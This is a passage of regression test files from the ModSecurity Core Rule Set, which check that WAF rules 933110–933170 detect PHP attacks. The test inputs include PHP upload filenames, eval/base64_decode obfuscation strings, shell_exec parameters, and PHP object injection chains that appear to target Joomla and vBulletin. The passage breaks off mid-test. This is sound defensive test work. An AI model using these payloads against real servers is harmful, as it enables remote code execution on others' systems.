dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fthi/sfewfda.php.............
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-17
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fthi/sfewfda.php907.............
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-18
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: fthi/sfewfda.phtml
port: 80
uri: /upload
output:
log_contains: id "933110"
-
test_title: 933110-19
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: fthi/sfewfda.phtml987...
port: 80
uri: /
output:
no_log_contains: id "933110"
-
test_title: 933110-20
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: a.php
port: 80
uri: /upload2
output:
log_contains: id "933110"
-
test_title: 933110-21
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: fda.php5...
port: 80
uri: /upload6
output:
log_contains: id "933110"
-
test_title: 933110-22
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: fthisfewfda.php.
port: 80
uri: /upload7
output:
log_contains: id "933110"
-
test_title: 933110-23
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: fthi/sfewfda.phtml987...
port: 80
uri: /
output:
no_log_contains: id "933110"

24
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml Normal file
View File

@@ -0,0 +1,24 @@
---
meta:
author: "Christian S.J. Peron"
description: None
enabled: true
name: 933120.yaml
tests:
-
test_title: 933120-1
desc: "PHP Injection Attack: Configuration Directive"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=session.bug_compat_42%3dtrue"
version: HTTP/1.0
output:
log_contains: id "933120"

91
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml Normal file
View File

@@ -0,0 +1,91 @@
---
meta:
author: csanders-git
description: Tests functionality of 933130
enabled: true
name: 933130.yaml
tests:
-
test_title: 933130-1
desc: Basic Request nothing should trigger
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
output:
no_log_contains: id "933130"
-
test_title: 933130-2
desc: Trigger a basic request
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_SERVER['test'];
output:
log_contains: id "933130"
-
test_title: 933130-3
desc: Non-Server Request
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_SE%20RVER['test'];
output:
no_log_contains: id "933130"
-
test_title: 933130-4
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53ERVER['test'];
output:
log_contains: id "933130"
-
test_title: 933130-5
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?%24_COOKIE=value;
output:
log_contains: id "933130"
-
test_title: 933130-6
desc: SERVER index listed with obfuscated SERVER
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53%20ERVER['request_uri'];
output:
no_log_contains: id "933130"

49
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml Normal file
View File

@@ -0,0 +1,49 @@
---
meta:
author: csanders-git
description: Tests functionality of stricter sibling 933131
enabled: true
name: 933131.yaml
tests:
-
test_title: 933131-1
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53ERVER['test'];
output:
no_log_contains: id "933131"
-
test_title: 933131-2
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?%24_COOKIE=value;
output:
no_log_contains: id "933131"
-
test_title: 933131-3
desc: SERVER index listed with obfuscated SERVER
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53%20ERVER['REQUEST_URI'];
output:
log_contains: id "933131"

24
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml Normal file
View File

@@ -0,0 +1,24 @@
---
meta:
author: "Christian S.J. Peron"
description: None
enabled: true
name: 933140.yaml
tests:
-
test_title: 933140-1
desc: "PHP Injection Attack: I/O Stream"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=php://stdout"
version: HTTP/1.0
output:
log_contains: id "933140"

239
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml Normal file
View File

@@ -0,0 +1,239 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933150.yaml
tests:
-
test_title: 933150-1
desc: pmf
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /base64_decode
output:
log_contains: id "933150"
-
test_title: 933150-2
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /base64_decode
output:
log_contains: id "933150"
-
test_title: 933150-3
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?base64_deCOde
output:
log_contains: id "933150"
-
test_title: 933150-4
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=bzdecomprEss
output:
log_contains: id "933150"
-
test_title: 933150-5
desc: base64_decode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
-
test_title: 933150-6
desc: fsockopen
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
-
test_title: 933150-7
desc: gzdecode
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
-
test_title: 933150-8
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
-
test_title: 933150-9
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?foo=FOOcall_user_func
output:
log_contains: id "933150"
-
test_title: 933150-10
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?I%20don%27t%20like%20gzuncompress
output:
log_contains: id "933150"
-
test_title: 933150-11
desc: GzInFlAtE
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?bar=pfsockopen%28%27foo%27%2C%2025%29
output:
log_contains: id "933150"
-
test_title: 933150-12
desc: posix_getpwuiD
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?bar=pfsockopen%28%27foo%27%2C%2025%29
output:
log_contains: id "933150"
-
test_title: 933150-13
desc: posix_getpwuiD
stages:
- stage:
input:
data: Shell%5fexec=bla
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"
-
test_title: 933150-14
desc: ZlIb_DeCoDe
stages:
- stage:
input:
data: Shell%5fexec=bla
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"
-
test_title: 933150-15
desc: get_defined_functions
stages:
- stage:
input:
data: foo=get_defined_functions%28%29%5B0%5D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"
-
test_title: 933150-16
desc: get_defined_vars
stages:
- stage:
input:
data: foo=get_defined_vars%28%29%5B0%5D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933150"

86
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml Normal file
View File

@@ -0,0 +1,86 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933151.yaml
tests:
-
test_title: 933151-1
desc: pmf + chain; must run test in PL2!
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /array_diff%20foo%20%28
output:
log_contains: id "933151"
-
test_title: 933151-2
desc: pmf + chain; must run test in PL2!
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?date_ADD%28%29
output:
log_contains: id "933151"
-
test_title: 933151-3
desc: non-dangorous PHP functions, removed to reduce FP
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=filemtime%28%24foo%29
output:
no_log_contains: id "933151"
-
test_title: 933151-4
desc: pmf + chain; must run test in PL2!
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /gethost
output:
log_contains: id "933151"
-
test_title: 933151-5
desc: No peren after keyword
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=array_diff
output:
no_log_contains: id "933151"

631
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml Normal file
View File

@@ -0,0 +1,631 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933160.yaml
tests:
-
test_title: 933160-1
desc: function call regexp
stages:
- stage:
input:
data: Shell%5fexec=bla
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chr%28123%29
output:
log_contains: id "933160"
-
test_title: 933160-2
desc: function call regexp
stages:
- stage:
input:
data: foo=curl_iNit%28%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
-
test_title: 933160-3
desc: function call regexp
stages:
- stage:
input:
data: eval($foo)
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
-
test_title: 933160-4
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
-
test_title: 933160-5
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=exec%0A%28%27bar%27%29
output:
log_contains: id "933160"
-
test_title: 933160-6
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=FILE%0D%0A%28%29
output:
log_contains: id "933160"
-
test_title: 933160-7
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=file_ExistS%20%28%0A%0A%29
output:
log_contains: id "933160"
-
test_title: 933160-8
desc: function call regexp
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-9
desc: '@ operator'
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-10
desc: func\t()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-11
desc: func//comment\r\n ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-12
desc: 'func #comment\n ()'
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-13
desc: func#\n ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-14
desc: 'func \t #\n ()'
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-15
desc: func/*comment*/()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-16
desc: func /*com*/ ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-17
desc: func \t/**/\t ()
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-18
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=fopen%20%20%28blah%29
output:
log_contains: id "933160"
-
test_title: 933160-19
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strrev()
output:
log_contains: id "933160"
-
test_title: 933160-20
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strREV%28%24x%29
output:
log_contains: id "933160"
-
test_title: 933160-21
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: ?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29
output:
log_contains: id "933160"
-
test_title: 933160-22
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /eval(gzinflate(str_rot13(base64_decode("")
output:
log_contains: id "933160"
-
test_title: 933160-23
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: eval%0D%28%24foo%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /eval%28base64_decode%28%27JGNoZWNrID...
output:
log_contains: id "933160"
-
test_title: 933160-24
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /
output:
log_contains: id "933160"
-
test_title: 933160-25
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: posix_getegid%28%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /getegid
output:
log_contains: id "933160"
-
test_title: 933160-26
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /print_r
output:
log_contains: id "933160"
-
test_title: 933160-27
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /astrrev()
output:
log_contains: id "933160"
-
test_title: 933160-28
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strrev
output:
log_contains: id "933160"
-
test_title: 933160-29
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /strrev(
output:
log_contains: id "933160"
-
test_title: 933160-30
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=eval
output:
log_contains: id "933160"
-
test_title: 933160-31
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=the%20files%20%28yep%29
output:
log_contains: id "933160"
-
test_title: 933160-32
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=exec%20%28
output:
log_contains: id "933160"
-
test_title: 933160-33
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=executor%28%29
output:
log_contains: id "933160"
-
test_title: 933160-34
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=cheval%28%24foo%29
output:
log_contains: id "933160"
-
test_title: 933160-35
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=audi%6ffile%28%24foo%29
output:
log_contains: id "933160"
-
test_title: 933160-36
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=the%20system%20is%20down%28%29
output:
log_contains: id "933160"
-
test_title: 933160-37
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=ecosystem%28%29
output:
log_contains: id "933160"
-
test_title: 933160-38
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=systems%28%29
output:
log_contains: id "933160"
-
test_title: 933160-39
desc: func\t/*foo\r\nbar*/\t (
stages:
- stage:
input:
data: x=Print_r%28%20%29
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=system%20something%28%29
output:
log_contains: id "933160"

87
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml Normal file
View File

@@ -0,0 +1,87 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933161.yaml
tests:
-
test_title: 933161-1
desc: regexp; must run test in PL3!
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?%20checkDate%28%29
output:
log_contains: id "933161"
-
test_title: 933161-2
desc: regexp; must run test in PL3!
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chroot%09%28%29
output:
log_contains: id "933161"
-
test_title: 933161-3
desc: symlink \t()
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chroot%09%28%29
output:
log_contains: id "933161"
-
test_title: 933161-4
desc: dl/*foo*/()
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chroot%09%28%29
output:
log_contains: id "933161"
-
test_title: 933161-5
desc: dl/*foo*/()
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=xucfirst%28%29
output:
no_log_contains: id "933161"

163
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml Normal file
View File

@@ -0,0 +1,163 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933170.yaml
tests:
-
test_title: 933170-1
desc: PHP object injection
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D
output:
log_contains: id "933170"
-
test_title: 933170-2
desc: PHP object injection
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
output:
log_contains: id "933170"
-
test_title: 933170-3
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize2
output:
log_contains: id "933170"
-
test_title: 933170-4
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D
output:
log_contains: id "933170"
-
test_title: 933170-5
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
output:
log_contains: id "933170"
-
test_title: 933170-6
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D
output:
log_contains: id "933170"
-
test_title: 933170-7
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize6
output:
log_contains: id "933170"
-
test_title: 933170-8
desc: PHP object injection
stages:
- stage:
input:
